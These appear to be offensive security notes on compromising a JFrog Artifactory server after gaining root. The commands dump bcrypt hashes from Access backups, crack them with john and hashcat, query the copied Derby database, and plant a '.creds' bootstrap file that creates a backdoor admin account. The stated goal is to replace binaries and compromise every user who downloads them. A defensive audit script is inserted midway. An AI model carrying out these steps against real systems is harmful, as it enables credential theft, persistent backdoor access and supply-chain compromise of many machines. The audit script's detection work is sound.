Artifactory

Assume a scenario where we have elevated privileges but want to get access to Artifactory itself to distribute rogue binaries for network compromise.

Check status: ps aux | grep artifactory

External access: http://serverip:8081

Sensitive information

With root access to the server, check /{ARTIFACTORY FOLDER}/var/backup/access for exported Artifactory (Access) accounts:

root@controller:/opt/jfrog/artifactory/var/backup/access# cat access.backup.20200730120454.json

Check the "password" field of each user entry; it holds a bcrypt hash. Save it to hash.txt:

hash.txt
$2a$08$xxxx./yyyy

Crack password

sudo john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
hashcat --hash-type=3200 hash.txt /usr/share/wordlists/rockyou.txt

Compromise DB

Copy the Derby database out of the Artifactory tree and remove its lock files so a second process can open it:
mkdir /tmp/hackeddb
sudo cp -r /opt/jfrog/artifactory/var/data/access/derby /tmp/hackeddb
sudo chmod 755 /tmp/hackeddb/derby
sudo rm /tmp/hackeddb/derby/*.lck

Since Artifactory is using Derby as its default database, we'll need Apache's Derby tools to be able to connect to it. More specifically, the ij command line tool, which allows the user to access a Derby database and perform queries against it. The Derby tools are already installed on the controller at /opt/derby, but they can also be downloaded if necessary.

Fortunately for us, the default database does not require a username and password and relies on file permissions to protect it. Because we have root privileges, we can connect without problems. Artifactory contains its own version of Java and we can use it to run the Derby connection utilities and connect to our database.

ij>
connect 'jdbc:derby:/tmp/hackeddb/derby';
select * from access_users;

Crack the bcrypt hashes as above

Add backdoor user

This method requires write access to the /opt/jfrog/artifactory/var/etc/access folder and the ability to change permissions on the newly-created file, which usually requires root or sudo access.

/opt/jfrog/artifactory/var/etc/access

Create hack.creds containing one line in the form user@ip=password (the * wildcard means the bootstrap user may log in from any IP):
admin2@*=adminpwd
sudo chmod 600 /opt/jfrog/artifactory/var/etc/access/hack.creds
sudo /opt/jfrog/artifactory/app/bin/artifactoryctl stop
sudo /opt/jfrog/artifactory/app/bin/artifactoryctl start

sudo grep "Create admin user" /opt/jfrog/artifactory/var/log/console.log
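The two preceding sections (the readable Access backup with its bcrypt hashes, and the bootstrap .creds file that Access consumes on restart) each leave an artifact on disk or in console.log. The script below is an added example, not part of the original notes, that audits an Artifactory home for those artifacts from the defender's side. It assumes the default layout under /opt/jfrog/artifactory (pass another path as the first argument) and, when run without arguments, exercises itself against a constructed temporary tree rather than a real install.

```shell
#!/bin/sh
# Added example, not part of the original notes: a read-only audit of an Artifactory
# home directory for the artifacts the notes above rely on. It assumes the default
# layout under /opt/jfrog/artifactory (override with the first argument).

# 1. Bootstrap credential files (*.creds) sitting in var/etc/access. Access reads
#    these on restart to create accounts, so one that nobody planted is a finding.
find_bootstrap_creds() {
    find "$1/var/etc/access" -maxdepth 1 -type f -name '*.creds' 2>/dev/null
}

# 2. Access backups readable by users other than the owner. They carry bcrypt
#    hashes of every account, so they should be mode 600 at most.
find_loose_backups() {
    find "$1/var/backup/access" -type f \( -perm -004 -o -perm -040 \) 2>/dev/null
}

# 3. Admin-creation events in console.log. A legitimate install logs this once at
#    bootstrap; a fresh entry later coincides with a restart that consumed a .creds file.
count_admin_creations() {
    log="$1/var/log/console.log"
    [ -f "$log" ] || { echo 0; return 0; }
    grep -c "Create admin user" "$log" || true
}

# Run the three checks and print one WARN line per finding.
audit_artifactory() {
    find_bootstrap_creds "$1" | while IFS= read -r f; do
        echo "WARN bootstrap credential file present: $f"
    done
    find_loose_backups "$1" | while IFS= read -r f; do
        echo "WARN access backup readable by group/others: $f"
    done
    n=$(count_admin_creations "$1")
    [ "$n" -gt 0 ] && echo "WARN console.log records $n admin user creation(s)"
    return 0
}

# Constructed fixture (not a real install) so the audit can be exercised offline:
# a planted .creds file, a world-readable backup and a matching log line.
build_sample_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/var/etc/access" "$root/var/backup/access" "$root/var/log"
    printf 'admin2@*=PLACEHOLDER_PASSWORD\n' > "$root/var/etc/access/hack.creds"
    chmod 600 "$root/var/etc/access/hack.creds"
    printf '{"users":[]}\n' > "$root/var/backup/access/access.backup.json"
    chmod 644 "$root/var/backup/access/access.backup.json"
    printf '[INFO ] Create admin user admin2\n[INFO ] Artifactory started\n' \
        > "$root/var/log/console.log"
    echo "$root"
}

# Usage: sh audit.sh /opt/jfrog/artifactory
# With no argument the constructed fixture is audited and then removed.
if [ $# -gt 0 ]; then
    audit_artifactory "$1"
else
    sample=$(build_sample_tree)
    audit_artifactory "$sample"
    rm -rf "$sample"
fi
```

The checks are deliberately read-only and need only read access to the Artifactory tree, so they can run from a cron job or a configuration-management agent; on a healthy install the expected output is no WARN lines at all, and the one "Create admin user" entry from initial bootstrap is the only acceptable count.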

We now have admin access to Artifactory and can modify binaries as we see fit.

In a real-world scenario, if users pull packages from Artifactory as a repository, running an update on their local system downloads the replaced binary, and the next time they run it they are compromised. The same applies when Artifactory is used as a simple file store for shared binaries: every subsequent download of the modified file compromises the user who runs it.

Artifactory is an excellent option for compromising many targets in a single effort and can help to expand access significantly within an internal network.
